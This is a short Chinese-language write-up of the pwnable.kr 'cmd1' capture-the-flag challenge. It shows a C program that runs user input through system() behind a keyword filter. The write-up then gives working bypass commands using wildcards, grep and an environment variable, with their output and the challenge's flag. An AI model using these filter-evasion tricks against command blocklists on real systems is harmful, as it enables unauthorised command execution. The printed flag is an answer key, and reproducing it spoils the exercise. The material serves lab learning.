pwnable.kr —— cmd1

question#

Mommy! what is PATH environment in Linux?

ssh cmd1@pwnable.kr -p2222 (pw:guest)

题目要求我们使用ssh登录到服务器上ssh cmd1@pwnable.kr -p2222，密码是guest,有的时候可能有身份的校验，这个时候需要加上参数-o StrictHostKeyChecking=no进行登录

cmd1#

#include <stdio.h>
#include <string.h>

int filter(char* cmd){
	int r=0;
	r += strstr(cmd, "flag")!=0;
	r += strstr(cmd, "sh")!=0;
	r += strstr(cmd, "tmp")!=0;
	return r;
}
int main(int argc, char* argv[], char** envp){
	putenv("PATH=/thankyouverymuch");
	if(filter(argv[1])) return 0;
	system( argv[1] );
	return 0;
}

analyse#

注意到：其中对输入的命令进行了过滤，去除了sh，tmp，flag字符

1. cat方法
   使用f*代替flag

2. grep方法
   同上使用通配符

3. 环境变量方法
   建立环境变量，值为flag

除此之外还可以有软链接，执行另一文件等

get flag#

cmd1@ubuntu:~$ ./cmd1 "/bin/cat f*"
mommy now I get what PATH environment is for :)
cmd1@ubuntu:~$ ./cmd1 "/bin/grep -Rn :"
Binary file cmd1 matches
flag:1:mommy now I get what PATH environment is for :)
/bin/grep: .bash_history: Permission denied
cmd1@ubuntu:~$ export f=flag
cmd1@ubuntu:~$ ./cmd1 "/bin/cat \$f"
mommy now I get what PATH environment is for :)

flag：mommy now I get what PATH environment is for :)